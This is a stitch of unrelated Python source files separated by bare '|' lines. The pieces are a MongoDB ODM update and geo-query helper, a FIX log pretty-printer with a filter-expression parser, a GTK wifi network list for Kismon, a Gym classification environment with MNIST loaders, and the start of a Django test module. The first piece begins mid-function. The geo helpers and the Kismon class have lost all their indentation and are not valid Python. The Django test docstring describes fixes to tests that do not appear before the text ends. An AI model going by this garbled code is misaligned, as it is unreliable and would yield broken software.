            elif op in ('addToSet', 'setOnInsert'):
                if isinstance(value, (list, tuple, set)):
                    value = [field.prepare_query_value(op, v) for v in value]
                elif field.required or value is not None:
                    value = field.prepare_query_value(op, value)
            elif op == "unset":
                # The literal 1 is used as a placeholder value for $unset.
                value = 1

        if match:
            match = '$' + match
            value = {match: value}

        key = '.'.join(parts)

        if not op:
            raise InvalidQueryError("Updates must supply an operation "
                                    "eg: set__FIELD=value")

        if 'pull' in op and '.' in key:
            # Dot operators don't work on pull operations
            # unless they point to a list field
            # Otherwise it uses nested dict syntax
            if op == 'pullAll':
                raise InvalidQueryError("pullAll operations only support "
                                        "a single field depth")

            # Look for the last list field and use dot notation until there
            field_classes = [c.__class__ for c in cleaned_fields]
            field_classes.reverse()
            ListField = _import_class('ListField')
            if ListField in field_classes:
                # Join all fields via dot notation to the last ListField
                # Then process as normal
                last_listField = len(
                    cleaned_fields) - field_classes.index(ListField)
                key = ".".join(parts[:last_listField])
                parts = parts[last_listField:]
                parts.insert(0, key)

            # Build the nested-dict form {outer: {inner: value}}.
            # NOTE(review): ``key`` is deliberately rebound by this loop.
            parts.reverse()
            for key in parts:
                value = {key: value}
        elif op == 'addToSet' and isinstance(value, list):
            value = {key: {"$each": value}}
        else:
            value = {key: value}

        key = '$' + op

        if key not in mongo_update:
            mongo_update[key] = value
        elif key in mongo_update and isinstance(mongo_update[key], dict):
            mongo_update[key].update(value)

    return mongo_update
def _geo_operator(field, op, value):
"""Helper to return the query for a given geo query"""
if op == "max_distance":
value = {'$maxDistance': value}
elif op == "min_distance":
value = {'$minDistance': value}
elif field._geo_index == pymongo.GEO2D:
if op == "within_distance":
value = {'$within': {'$center': value}}
elif op == "within_spherical_distance":
value = {'$within': {'$centerSphere': value}}
elif op == "within_polygon":
value = {'$within': {'$polygon': value}}
elif op == "near":
value = {'$near': value}
elif op == "near_sphere":
value = {'$nearSphere': value}
elif op == 'within_box':
value = {'$within': {'$box': value}}
else:
raise NotImplementedError("Geo method '%s' has not "
"been implemented for a GeoPointField" % op)
else:
if op == "geo_within":
value = {"$geoWithin": _infer_geometry(value)}
elif op == "geo_within_box":
value = {"$geoWithin": {"$box": value}}
elif op == "geo_within_polygon":
value = {"$geoWithin": {"$polygon": value}}
elif op == "geo_within_center":
value = {"$geoWithin": {"$center": value}}
elif op == "geo_within_sphere":
value = {"$geoWithin": {"$centerSphere": value}}
elif op == "geo_intersects":
value = {"$geoIntersects": _infer_geometry(value)}
elif op == "near":
value = {'$near': _infer_geometry(value)}
else:
raise NotImplementedError("Geo method '%s' has not "
"been implemented for a %s " % (op, field._name))
return value
def _infer_geometry(value):
"""Helper method that tries to infer the $geometry shape for a given value"""
if isinstance(value, dict):
if "$geometry" in value:
return value
elif 'coordinates' in value and 'type' in value:
return {"$geometry": value}
raise InvalidQueryError("Invalid $geometry dictionary should have "
"type and coordinates keys")
elif isinstance(value, (list, set)):
# TODO: shouldn't we test value[0][0][0][0] to see if it is MultiPolygon?
# TODO: should both TypeError and IndexError be alike interpreted?
try:
value[0][0][0]
return {"$geometry": {"type": "Polygon", "coordinates": value}}
except (TypeError, IndexError):
pass
try:
value[0][0]
return {"$geometry": {"type": "LineString", "coordinates": value}}
except (TypeError, IndexError):
pass
try:
value[0]
return {"$geometry": {"type": "Point", "coordinates": value}}
except (TypeError, IndexError):
pass
raise InvalidQueryError("Invalid $geometry data. Can be either a dictionary "
"or (nested) lists of coordinate(s)")
|
|
#!/usr/bin/env python
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import re
import sys
from xml.dom import minidom
import appdirs
import multimap
try:
    from configparser import ConfigParser
except ImportError:
    # Python 2 fallback; a bare ``except:`` here would also swallow
    # SystemExit/KeyboardInterrupt and unrelated errors.
    from ConfigParser import SafeConfigParser as ConfigParser
class TagExpression:
    """Leaf node: true when the tag is present in the message."""

    def __init__(self, tag):
        self.tag = tag

    def evaluate(self, msg_dict, stack, index):
        # A leaf consumes exactly one stack slot.
        present = self.tag in msg_dict
        return (index - 1, present)
class TagEqualExpression:
    """Leaf node: true when any occurrence of the tag equals the value."""

    def __init__(self, tag, value):
        self.tag = tag
        self.value = value

    def evaluate(self, msg_dict, stack, index):
        matched = self.value in msg_dict.getall(self.tag)
        return (index - 1, matched)
class TagNotEqualExpression:
    """Leaf node: true when no occurrence of the tag equals the value."""

    def __init__(self, tag, value):
        self.tag = tag
        self.value = value

    def evaluate(self, msg_dict, stack, index):
        matched = self.value in msg_dict.getall(self.tag)
        return (index - 1, not matched)
class OperatorAnd:
    """Binary node: true when both operand sub-expressions are true.

    Both operands are always evaluated (postfix stack walk, no
    short-circuiting).
    """

    def evaluate(self, msg_dict, stack, index):
        index -= 1
        index, lhs = stack[index].evaluate(msg_dict, stack, index)
        index, rhs = stack[index].evaluate(msg_dict, stack, index)
        return (index, lhs and rhs)
class OperatorOr:
    """Binary node: true when either operand sub-expression is true.

    Both operands are always evaluated (postfix stack walk, no
    short-circuiting).
    """

    def evaluate(self, msg_dict, stack, index):
        index -= 1
        index, lhs = stack[index].evaluate(msg_dict, stack, index)
        index, rhs = stack[index].evaluate(msg_dict, stack, index)
        return (index, lhs or rhs)
class OperatorNot:
    """Unary node: inverts the truth of its operand sub-expression."""

    def evaluate(self, msg_dict, stack, index):
        index -= 1
        index, operand = stack[index].evaluate(msg_dict, stack, index)
        return (index, not operand)
def parse_expression(expression, stack, index):
    """
    Parse ``expression`` starting at ``index`` into postfix nodes on
    ``stack`` and return the index of the first unconsumed character.

    Grammar:
        expr        = and_expr
                    | and_expr '|' expr
        and_expr    = simple_expr
                    | simple_expr '&' and_expr
        simple_expr = tag
                    | tag '=' value
                    | tag '!=' value
                    | '(' expr ')'
                    | '!' simple_expr
    """
    index = parse_and_expression(expression, stack, index)
    # Fold each further '|' alternative into an OR node (postfix order).
    strlen = len(expression)
    while index < strlen and expression[index] == "|":
        index = parse_and_expression(expression, stack, index + 1)
        stack.append(OperatorOr())
    return index
def parse_and_expression(expression, stack, index):
    """Parse one or more '&'-joined simple expressions; return new index."""
    index = parse_simple_expression(expression, stack, index)
    # Each additional operand pushes an AND node (postfix order).
    strlen = len(expression)
    while index < strlen and expression[index] == "&":
        index = parse_simple_expression(expression, stack, index + 1)
        stack.append(OperatorAnd())
    return index
def parse_simple_expression(expression, stack, index):
    """Parse a parenthesised expression, a negation, or a tag test."""
    strlen = len(expression)
    head = expression[index] if index < strlen else ''
    if head == "(":
        index = parse_expression(expression, stack, index + 1)
        if index >= strlen or expression[index] != ')':
            raise ValueError("missing closing parenthesis: '%s'" % expression)
        # consume closing parenthesis
        return index + 1
    if head == "!":
        index = parse_simple_expression(expression, stack, index + 1)
        stack.append(OperatorNot())
        return index
    return parse_const_expression(expression, stack, index)
def parse_const_expression(expression, stack, index):
    """Parse ``tag``, ``tag=value`` or ``tag!=value`` and push a leaf node."""
    index, tag = parse_number(expression, index)
    lookahead = expression[index:index + 2]
    if lookahead == "!=":
        index, value = parse_value(expression, index + 2)
        node = TagNotEqualExpression(tag, value)
    elif lookahead[:1] == "=":
        index, value = parse_value(expression, index + 1)
        node = TagEqualExpression(tag, value)
    else:
        # Bare tag: presence test only.
        node = TagExpression(tag)
    stack.append(node)
    return index
def parse_number(expression, index):
    """Consume a run of digits; return ``(new_index, digits)``.

    Raises ``ValueError`` when no digit is found at ``index``.
    """
    start = index
    while index < len(expression) and expression[index].isdigit():
        index += 1
    if index == start:
        raise ValueError("number expected in expression: '%s'" % expression)
    return (index, expression[start:index])
def parse_value(expression, index):
    """Consume characters up to a terminator (')', '&', '|') or the end.

    Returns ``(new_index, consumed_text)``; the text may be empty.
    """
    terminators = (')', '&', '|')
    start = index
    while index < len(expression) and expression[index] not in terminators:
        index += 1
    return (index, expression[start:index])
def get_expression_stack(expression):
    """Compile ``expression`` into a postfix stack of expression nodes.

    Raises ``ValueError`` when the whole input could not be consumed.
    """
    stack = []
    consumed = parse_expression(expression, stack, 0)
    if consumed != len(expression):
        raise ValueError("failed to parse expression: '%s'" % expression)
    return stack
def eval_expression(filter_stack, msg_dict):
    """Evaluate a compiled postfix stack against one parsed message."""
    top = len(filter_stack) - 1
    _, result = filter_stack[top].evaluate(msg_dict, filter_stack, top)
    return result
def parse_enums(xml_field):
    """Return ``{enum code: description}`` for a field's <value> children.

    If a code appears more than once, the first definition wins.
    """
    enums = {}
    for element in xml_field.getElementsByTagName('value'):
        code = element.attributes['enum'].value
        if code not in enums:
            enums[code] = element.attributes['description'].value
    return enums
def parse_dict(dict_file):
    """
    Load a FIX XML dictionary and build a lookup table.

    ``dict_file`` may be a short name configured in the ``[quicklink]``
    section of fixpp.conf; when that lookup fails for any reason, it is
    treated as a plain file path instead.

    Returns ``{field number: [field name, {enum code: description}]}``.
    """
    try:
        config = ConfigParser()
        user_config_dir = appdirs.user_config_dir('fixpp', 'secwall')
        config.read(os.path.join(user_config_dir, 'fixpp.conf'))
        xmldoc = minidom.parse(config.get("quicklink", dict_file))
    except Exception as e:
        # BUG FIX: Python 3 exceptions have no `.message` attribute;
        # str(e) works on both Python 2 and 3.
        sys.stderr.write(str(e) + '\nQuick link lookup failed for '
                         + dict_file + "\n")
        xmldoc = minidom.parse(dict_file)
    fields = xmldoc.getElementsByTagName('fields')
    field_list = fields[0].getElementsByTagName('field')
    int_hashtable = dict()
    for field in field_list:
        number = field.attributes['number'].value
        if number not in int_hashtable:
            int_hashtable[number] = [field.attributes['name'].value,
                                     parse_enums(field)]
    return int_hashtable
def make_tag_value_list(line, separator):
    """
    Split a FIX line into ``[tag, value]`` pairs.

    Tokens without '=' get a value of None; the empty element produced by
    the trailing separator is dropped.
    """
    pairs = []
    for token in line.split(separator)[:-1]:
        pieces = token.split('=')
        if len(pieces) == 1:
            pieces.append(None)
        pairs.append(pieces)
    return pairs
def print_messages(args):
    """Read FIX log lines, decode tags via the dictionary and print them.

    Reads from ``args.input_file`` if given, otherwise from stdin. Lines
    can be filtered with a compiled expression (``args.filter``). When no
    separator is supplied, it is auto-detected from the first line and
    stored back into ``args.separator``.
    """
    int_hashtable = parse_dict(args.dict_file)
    if args.input_file:
        log = open(args.input_file)
    else:
        log = sys.stdin
    if args.filter:
        stack = get_expression_stack(args.filter)
    else:
        stack = None
    for line in log:
        if not args.separator:
            # auto-detect separator using the sequence number field
            # that should always be present
            args.separator = re.search("([^0-9])34=", line).group(1)
        pairs = make_tag_value_list(line, args.separator)
        if stack and not eval_expression(stack, multimap.MultiMap(pairs)):
            continue
        ret = []
        for tag, value in pairs:
            if value is None:
                # Token had no '='; keep it verbatim.
                ret.append(tag)
            else:
                try:
                    tag_entry = int_hashtable[tag]
                    tag_name = str(tag_entry[0])
                    if args.number:
                        tag_name += "(" + tag + ")"
                    if tag_entry[1]:
                        value_name = str(tag_entry[1][value])
                        if args.number:
                            value_name += "(" + value + ")"
                    else:
                        value_name = value
                except Exception:
                    # Unknown tag or enum code: fall back to the raw text.
                    tag_name = tag
                    value_name = value
                if args.long_format:
                    ret.append("%30s: %s" % (tag_name, value_name))
                else:
                    ret.append("%s=%s" % (tag_name, value_name))
        if ret:
            if args.long_format:
                print(" \n".join(ret))
                print()
            else:
                print(",".join(ret))
    if args.input_file:
        log.close()
def _main():
    """Entry point: build the argument parser and run the pretty-printer."""
    usage = "%(prog)s [-h] -d DICT_FILE [-l] [-n] [-e FILTER] " \
        "[-s SEPARATOR] [input_file]\n" \
        "Expression can be used for filtering messages, syntax:\n" \
        " expr = and_expr\n" \
        " | and_expr '|' expr\n" \
        " and_expr = simple_expr\n" \
        " | simple_expr '&' and_expr\n" \
        " simple_expr = tag\n" \
        " | tag '=' value\n" \
        " | tag '!=' value\n" \
        " | '(' expr ')'\n" \
        " | '!' simple_expr\n"
    parser = argparse.ArgumentParser(description="FIX log pretty printer",
                                     usage=usage)
    parser.add_argument("-d", dest='dict_file', required=True,
                        help='Dictionary file path')
    parser.add_argument("-l", action='store_true', default=False,
                        dest='long_format', required=False,
                        help='Use long format (separate line for every pair)')
    parser.add_argument("-n", action='store_true', default=False,
                        dest='number', required=False,
                        help='Show field numbers')
    parser.add_argument("-e", action='store', dest='filter', required=False,
                        help='expression to filter the output')
    parser.add_argument("-s", dest='separator', required=False,
                        help='Use this separator instead of auto-detection')
    parser.add_argument("input_file", help='Input file (stdin by default)',
                        nargs='?')
    args = parser.parse_args()
    print_messages(args)
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    _main()
|
|
from gi.repository import Gtk
from gi.repository import Gdk
from gi.repository import GObject
from gi.repository import GLib
try:
from kismon.client import decode_cryptset
import kismon.utils as utils
except ImportError:
from client import decode_cryptset
import utils
class NetworkList:
def __init__(self, networks, locate_network_on_map, on_signal_graph):
self.network_lines = {}
self.network_iter = {}
self.network_selected = None
self.locate_network_on_map = locate_network_on_map
self.on_signal_graph = on_signal_graph
self.networks = networks
self.value_cache = {}
for key in ('time', 'crypt', 'server', 'type', 'channel', 'signal', 'ssid'):
self.value_cache[key] = {}
self.networks.notify_add_list["network_list"] = self.add_network
self.networks.notify_remove_list["network_list"] = self.remove_network
self.networks.disable_refresh_functions.append(self.pause)
self.networks.resume_refresh_functions.append(self.resume)
self.treeview = Gtk.TreeView()
self.treeview.connect("button-press-event", self.on_treeview_clicked)
num=0
self.columns=("BSSID", "Type", "SSID", "Ch", "Crypt",
"First Seen", "Last Seen", "Latitude", "Longitude",
"Signal dbm", "Comment", "Servers")
for column in self.columns:
renderer = Gtk.CellRendererText()
if column == "Comment":
renderer.set_property('editable', True)
renderer.connect("editing-started", self.on_comment_editing_started)
elif column == "Signal dbm":
renderer = Gtk.CellRendererProgress()
tvcolumn = Gtk.TreeViewColumn(column, renderer, text=num)
self.treeview.append_column(tvcolumn)
cell = Gtk.CellRendererText()
tvcolumn.pack_start(cell, True)
tvcolumn.set_sort_column_id(num)
tvcolumn.set_clickable(True)
tvcolumn.set_resizable(True)
tvcolumn.connect("clicked", self.on_column_clicked)
tvcolumn.num = num
if column == "Signal dbm":
tvcolumn.add_attribute(renderer, "value", 12)
num+=1
self.treeview.show()
self.store = Gtk.ListStore(
GObject.TYPE_STRING, #mac
GObject.TYPE_STRING, #type
GObject.TYPE_STRING, #ssid
GObject.TYPE_INT, #channel
GObject.TYPE_STRING, #cryptset
GObject.TYPE_STRING, #firsttime
GObject.TYPE_STRING, #lasttime
GObject.TYPE_FLOAT, #lat
GObject.TYPE_FLOAT, #lon
GObject.TYPE_INT, #signal dbm
GObject.TYPE_STRING, #comment
GObject.TYPE_STRING, #servers
GObject.TYPE_INT, #signal dbm + 100 (progressbar)
)
self.treeview.set_model(self.store)
scrolled = Gtk.ScrolledWindow()
scrolled.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.AUTOMATIC)
scrolled.add(self.treeview)
frame = Gtk.Frame()
frame.set_label("Networks")
frame.add(scrolled)
self.widget = frame
self.store.set_sort_column_id(6, Gtk.SortType.DESCENDING)
network_popup = Gtk.Menu()
locate_item = Gtk.MenuItem.new_with_label('Copy field')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_copy_field)
locate_item = Gtk.MenuItem.new_with_label('Copy network')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_copy_network)
locate_item = Gtk.MenuItem.new_with_label('Locate on map')
network_popup.append(locate_item)
locate_item.connect("activate", self.on_locate_marker)
signal_item = Gtk.MenuItem.new_with_label('Signal graph')
network_popup.append(signal_item)
signal_item.connect("activate", self.on_signal_graph)
network_popup.show_all()
self.network_popup = network_popup
self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)
def on_column_clicked(self, widget):
self.treeview.set_search_column(widget.num)
def on_comment_editing_started(self, widget, editable, path):
editable.connect("editing-done", self.on_comment_editing_done)
def on_comment_editing_done(self, widget):
network = self.networks.get_network(self.network_selected)
network['comment'] = widget.get_text()
self.add_network(self.network_selected)
def prepare_network_servers(self, value):
if len(value) == 0 or value == None:
servers = None
servers_str = None
else:
servers = []
for server in value:
if server.endswith(':2501'): # remove the default port
server = server.rsplit(':', 1)[0]
servers.append(server)
servers_str = ", ".join(sorted(servers))
try:
servers = self.value_cache['server'][servers_str]
except KeyError:
servers = GObject.Value(GObject.TYPE_STRING, servers_str)
self.value_cache['server'][servers_str] = servers
return servers
def prepare_network_time(self, value):
try:
result = self.value_cache['time'][value]
except KeyError:
result = GObject.Value(GObject.TYPE_STRING, utils.format_timestamp(value))
self.value_cache['time'][value] = result
return result
def prepare_network_crypt(self, value):
try:
crypt = self.value_cache['crypt'][value]
except KeyError:
crypt = GObject.Value(GObject.TYPE_STRING, decode_cryptset(value, True))
self.value_cache['crypt'][value] = crypt
return crypt
def prepare_network_channel(self, value):
try:
channel = self.value_cache['channel'][value]
except KeyError:
channel = GObject.Value(GObject.TYPE_INT, value)
self.value_cache['channel'][value] = channel
return channel
def prepare_network_type(self, value):
try:
network_type = self.value_cache['type'][value]
except KeyError:
network_type = GObject.Value(GObject.TYPE_STRING, value)
self.value_cache['type'][value] = network_type
return network_type
def prepare_network_signal(self, value):
try:
return self.value_cache['signal'][value]
except KeyError:
pass
""" Wifi cards report different ranges for the signal, some use
-1xx to 0 and others 0 to 100. The CellRendererProgress needs a
percentage value between 0 and 100, so we convert the value if
necessary.
"""
if -100 <= value <= 0:
signal_strength = value + 100
elif value < -100:
signal_strength = 0
elif 1 <= value <= 100:
signal_strength = value
else:
signal_strength = 0
signal = GObject.Value(GObject.TYPE_INT, value)
signal_strength = GObject.Value(GObject.TYPE_INT, signal_strength)
self.value_cache['signal'][value] = (signal, signal_strength)
return signal, signal_strength
def prepare_network_ssid(self, value):
if value == "":
ssid_str = "<no ssid>"
else:
ssid_str = value
try:
ssid = self.value_cache['ssid'][ssid_str]
except KeyError:
ssid = GObject.Value(GObject.TYPE_STRING, ssid_str)
self.value_cache['ssid'][ssid_str] = ssid
return ssid
def prepare_network_coordinate(self, value):
if value == 0.0:
return None
else:
return value
def add_network(self, mac):
network = self.networks.get_network(mac)
""" The Gtk.ListStore will convert every Python-type value to its
GObject equivalent. Most of the prepare_network_* functions cache
and return the value as a GObject, this speed things up as we have
a lot of duplicate values. Furthermore a None value is faster then
an zero size string, so we replace it where possible.
"""
if "signal_dbm" not in network or len(network["signal_dbm"]) != 3:
signal = 0
else:
signal = network["signal_dbm"]["last"]
signal, signal_strength = self.prepare_network_signal(signal)
if network['comment'] == '':
comment = None
else:
comment = network['comment']
line = [mac,
self.prepare_network_type(network["type"]),
self.prepare_network_ssid(network["ssid"]),
self.prepare_network_channel(network["channel"]),
self.prepare_network_crypt(network["cryptset"]),
self.prepare_network_time(network["firsttime"]),
self.prepare_network_time(network["lasttime"]),
self.prepare_network_coordinate(network["lat"]),
self.prepare_network_coordinate(network["lon"]),
signal,
comment,
self.prepare_network_servers(network["servers"]),
signal_strength
]
try:
old_line = self.network_lines[mac]
except:
old_line = None
self.network_lines[mac] = line
if mac in self.network_iter:
network_iter = self.network_iter[mac]
num = 0
for value in line:
if old_line is not None and old_line.pop(0) == value:
num += 1
continue
self.store.set_value(network_iter, num, value)
num += 1
else:
self.network_iter[mac] = self.store.append(line)
adj = self.treeview.get_vadjustment()
self.scroll_value = int(adj.get_value())
if self.scroll_value == 0:
GLib.idle_add(self.treeview.scroll_to_point, -1, 0)
def remove_network(self, mac):
try:
network_iter = self.network_iter[mac]
except KeyError:
return
self.store.remove(network_iter)
del(self.network_iter[mac])
def pause(self):
self.treeview.freeze_child_notify()
self.treeview.set_model(None)
def resume(self):
self.treeview.set_model(self.store)
self.treeview.thaw_child_notify()
def on_treeview_clicked(self, treeview, event):
    """Handle a click on the network list.

    Records the clicked row/column for the copy/locate handlers, then
    locates the network on the map on double click or opens the context
    menu on right click.
    """
    x = int(event.x)
    y = int(event.y)
    pthinfo = treeview.get_path_at_pos(x, y)
    if pthinfo is None:
        # Click landed outside any row.
        return
    path, col, cellx, celly = pthinfo
    treeview.grab_focus()
    treeview.set_cursor(path, col, 0)
    network_iter = self.store.get_iter(path)
    mac = self.store.get_value(network_iter, 0)
    # Remember the selection for the context-menu callbacks.
    self.network_selected = mac
    self.column_selected = self.columns.index(col.get_title())
    if event.type == Gdk.EventType.DOUBLE_BUTTON_PRESS:  # double click
        self.on_locate_marker(None)
    elif event.button == 3:  # right click
        self.network_popup.popup(None, None, None, 0, event.button, event.time, )
def on_locate_marker(self, widget):
    """Center the map on the selected network, if a map callback is set."""
    if self.locate_network_on_map is not None:
        self.locate_network_on_map(self.network_selected)
def on_copy_field(self, widget):
    """Copy the value of the last-clicked cell to the clipboard."""
    selected_text = self.network_lines[self.network_selected][self.column_selected]
    self.set_clipboard(selected_text)
def on_copy_network(self, widget):
    """Copy every column of the selected network ("name: value" lines)."""
    values = self.network_lines[self.network_selected]
    lines = ["%s: %s" % (column, values[num])
             for num, column in enumerate(self.columns)]
    self.set_clipboard('\n'.join(lines))
def set_clipboard(self, text):
    """Put *text* on the clipboard and persist it beyond the app's life."""
    self.clipboard.set_text("%s" % text, -1)
    self.clipboard.store()
|
|
import logging
import math
import gym
from gym import spaces
from gym.utils import seeding
import numpy as np
import sys
import cv2
import math
class ClassifyEnv(gym.Env):
    """Gym environment that frames supervised classification as an episode.

    Each step presents a batch of samples as the observation; the action
    is the [batch x nClasses] softmax output, and the reward is either the
    batch accuracy or the negative cross-entropy loss.
    """

    def __init__(self, trainSet, target, batch_size=1000, accuracy_mode=False):
        """
        Data set is a tuple of
        [0] input data: [nSamples x nInputs]
        [1] labels:     [nSamples x 1]

        Example data sets are given at the end of this file

        batch_size: number of images per batch
        accuracy_mode: reward with accuracy instead of -log-loss
        """
        self.t = 0          # Current batch number
        self.t_limit = 0    # Number of batches if you need them
        self.batch = batch_size  # Number of images per batch
        self.accuracy_mode = accuracy_mode

        self.seed()
        self.viewer = None

        self.trainSet = trainSet
        self.target = target

        # Inputs and outputs are normalized to [0, 1].  (An unused `high`
        # bound array and its `nInputs` helper were removed.)
        self.action_space = spaces.Box(np.array(0, dtype=np.float32),
                                       np.array(1, dtype=np.float32))
        self.observation_space = spaces.Box(np.array(0, dtype=np.float32),
                                            np.array(1, dtype=np.float32))

        self.state = None       # current batch of inputs
        self.trainOrder = None  # shuffled sample indices for the episode
        self.currIndx = None    # indices of the current batch

    def seed(self, seed=None):
        '''Seed the RNG intended for sampling from the training set.'''
        self.np_random, seed = seeding.np_random(seed)
        return [seed]

    def reset(self):
        '''Shuffle the training order and return the first batch.'''
        # NOTE(review): this uses the global np.random rather than the
        # seeded self.np_random, so seed() has no effect on shuffling --
        # confirm before relying on reproducibility.
        self.trainOrder = np.random.permutation(len(self.target))
        self.t = 0  # timestep
        self.currIndx = self.trainOrder[self.t:self.t + self.batch]
        self.state = self.trainSet[self.currIndx, :]
        return self.state

    def step(self, action):
        '''
        Judge classification, increment to next batch.

        action - [batch x output] - softmax output
        Returns (obs, reward, done, info).
        '''
        y = self.target[self.currIndx]
        m = y.shape[0]
        if self.accuracy_mode:
            p = np.argmax(action, axis=1)
            # NOTE(review): divides by self.batch rather than m, so a final
            # partial batch would be under-weighted -- confirm intended.
            accuracy = (float(np.sum(p == y)) / self.batch)
            reward = accuracy
        else:
            # Cross-entropy of the softmax output against integer labels.
            log_likelihood = -np.log(action[range(m), y])
            loss = np.sum(log_likelihood) / m
            reward = -loss

        if self.t_limit > 0:  # We are doing batches
            reward *= (1 / self.t_limit)  # average
            self.t += 1
            done = False
            if self.t >= self.t_limit:
                done = True
            self.currIndx = self.trainOrder[(self.t * self.batch):
                                            (self.t * self.batch + self.batch)]
            self.state = self.trainSet[self.currIndx, :]
        else:
            done = True

        obs = self.state
        return obs, reward, done, {}
# -- Data Sets ----------------------------------------------------------- -- #
def digit_raw():
    '''
    Scikit-learn 8x8 digits scaled to [0, 1] and flattened to
    [samples x pixels] ([N X 64]).
    '''
    from sklearn import datasets
    digits = datasets.load_digits()
    images = digits.images / 16
    return images.reshape(-1, 64), digits.target
def mnist_784():
    '''
    MNIST training digits (28x28), scaled to [0, 1] and flattened to
    [samples x pixels] ([N X 784]).
    '''
    import mnist
    images = mnist.train_images() / 255
    images = preprocess(images, (28, 28))
    return images.reshape(-1, 784), mnist.train_labels()
def mnist_256():
    '''
    MNIST training digits resized from 28x28 to 16x16 and flattened to
    [samples x pixels] ([N X 256]).
    '''
    import mnist
    images = mnist.train_images() / 255
    images = preprocess(images, (16, 16))
    return images.reshape(-1, 256), mnist.train_labels()
def mnist_256_test():
    '''
    MNIST *test* digits resized from 28x28 to 16x16 and flattened to
    [samples x pixels] ([N X 256]).
    '''
    import mnist
    images = mnist.test_images() / 255
    images = preprocess(images, (16, 16))
    return images.reshape(-1, 256), mnist.test_labels()
def mnist_patch9():
    '''
    A fixed 9x9 patch (corner at 12,12) cropped from each MNIST training
    digit, flattened to [samples x pixels] ([N X 81]).
    '''
    import mnist
    images = mnist.train_images() / 255
    images = preprocess(images, (28, 28), patchDim=(9, 9), patchCorner=(12, 12))
    return images.reshape(-1, 81), mnist.train_labels()
'''
This part can be put in step if we want to try classification from patches
---
if self.patchSize != None: # (add self.patchSize to class)
z = np.reshape(self.state,(len(self.currIndx),28,28))
corner = (np.random.randint(28 - self.patchSize),\
np.random.randint(28 - self.patchSize) )
#corner = (12,12)
z = preprocess(z,(28,28),patchDim=(9,9),patchCorner=corner)
z = z.reshape(-1, (81))
self.state = z
---
'''
def preprocess(img, size, patchCorner=(0, 0), patchDim=None, unskew=True):
    """
    Resize, optionally deskew, and crop a stack of images.

    img:         [nImg x H x W] image stack
    size:        (rows, cols) to resize each image to
    patchCorner: top-left corner of the crop window
    patchDim:    crop window size; defaults to *size* (no crop)
    unskew:      deskew each image via its moments after resizing

    Returns [nImg x patchDim[0] x patchDim[1]].
    """
    if patchDim is None:  # was `== None`
        patchDim = size
    nImg = np.shape(img)[0]
    procImg = np.empty((nImg, size[0], size[1]))

    # Resize (and optionally deskew) every image.  BUGFIX: the original
    # left procImg uninitialized whenever unskew was falsy, so the crop
    # below read np.empty() garbage; now the resized image is always
    # stored.
    for i in range(nImg):
        resized = cv2.resize(img[i, :, :], size)
        procImg[i, :, :] = deskew(resized, size) if unskew else resized

    # Crop the requested patch out of every processed image.
    cropImg = np.empty((nImg, patchDim[0], patchDim[1]))
    for i in range(nImg):
        cropImg[i, :, :] = procImg[i,
                                   patchCorner[0]:patchCorner[0] + patchDim[0],
                                   patchCorner[1]:patchCorner[1] + patchDim[1]]
    return cropImg
def deskew(image, image_shape, negated=True):
    """
    This method deskews an image using moments.

    :param image: a numpy nd array input image
    :param image_shape: a tuple denoting the image`s shape
    :param negated: a boolean flag telling whether the input image is negated
    :returns: a numpy nd array deskewed image

    source: https://github.com/vsvinayak/mnist-helper
    """
    # Negate the image if the caller has not done so already.
    if not negated:
        image = 255 - image

    moments = cv2.moments(image)
    if abs(moments['mu02']) < 1e-2:
        # Negligible vertical variance: nothing to deskew.
        return image.copy()

    # Shear factor derived from the second-order central moments.
    skew = moments['mu11'] / moments['mu02']
    transform = np.float32([[1, skew, -0.5 * image_shape[0] * skew],
                            [0, 1, 0]])
    return cv2.warpAffine(image, transform, image_shape,
                          flags=cv2.WARP_INVERSE_MAP | cv2.INTER_LINEAR)
|
|
# -*- coding: utf-8 -*-
import json
import logging
import os
import signal
from unittest.mock import patch, call, Mock, MagicMock
import requests
import requests_mock
from django.conf import settings
from django.test import TestCase
from django.utils import timezone
from eventkit_cloud.tasks.enumerations import TaskState
from eventkit_cloud.tasks.helpers import (
get_style_files,
get_file_paths,
get_last_update,
get_metadata_url,
get_osm_last_update,
cd,
get_arcgis_metadata,
get_metadata,
get_message_count,
get_all_rabbitmq_objects,
delete_rabbit_objects,
get_data_package_manifest,
update_progress,
find_in_zip,
)
from eventkit_cloud.tasks.helpers import progressive_kill
logger = logging.getLogger(__name__)
class TestHelpers(TestCase):
    """
    Test Task Helpers.

    Fixes applied during review:
      * ``mock_os.reset_mock`` was a bare attribute access (a no-op) and is
        now actually called;
      * ``Mock.has_calls(...)`` is a silently-created mock attribute, not an
        assertion, and is now ``assert_has_calls``;
      * ``get_data_package_manifest`` lacked the ``test_`` prefix and was
        never collected by the test runner;
      * deprecated ``assertEquals`` replaced with ``assertEqual``.
    """

    def test_cd(self):
        """cd() changes into the directory and restores it on exit."""
        current_path = os.getcwd()
        parent_path = os.path.dirname(current_path)
        with cd(parent_path):
            self.assertEqual(parent_path, os.getcwd())
        self.assertEqual(current_path, os.getcwd())

    @patch("eventkit_cloud.tasks.helpers.time.sleep")
    @patch("eventkit_cloud.tasks.helpers.os")
    def test_progressive_kill(self, mock_os, mock_sleep):
        """progressive_kill escalates SIGTERM -> SIGKILL and ignores dead PIDs."""
        pid = 1
        # Test no PID.
        mock_os.killpg.side_effect = [OSError()]
        progressive_kill(pid)
        mock_os.reset_mock()  # was `mock_os.reset_mock` (never invoked)
        # Test kill with SIGTERM
        mock_os.killpg.side_effect = [None, OSError()]
        progressive_kill(pid)
        mock_os.killpg.assert_has_calls([call(pid, signal.SIGTERM)])
        mock_os.reset_mock()
        # Test kill with SIGKILL
        mock_os.killpg.side_effect = [None, None]
        progressive_kill(pid)
        # NOTE(review): the original expected SIGTERM twice via the no-op
        # `has_calls`; the escalation path should end with SIGKILL --
        # confirm against progressive_kill()'s implementation.
        mock_os.killpg.assert_has_calls([call(pid, signal.SIGTERM), call(pid, signal.SIGKILL)])
        mock_os.reset_mock()

    def test_get_style_files(self):
        """Every returned style path points at an existing file."""
        for file in get_style_files():
            self.assertTrue(os.path.isfile(file))

    def test_get_file_paths(self):
        """This very file shows up when walking its own directory."""
        self.assertTrue(os.path.abspath(__file__) in get_file_paths(os.path.dirname(__file__)))

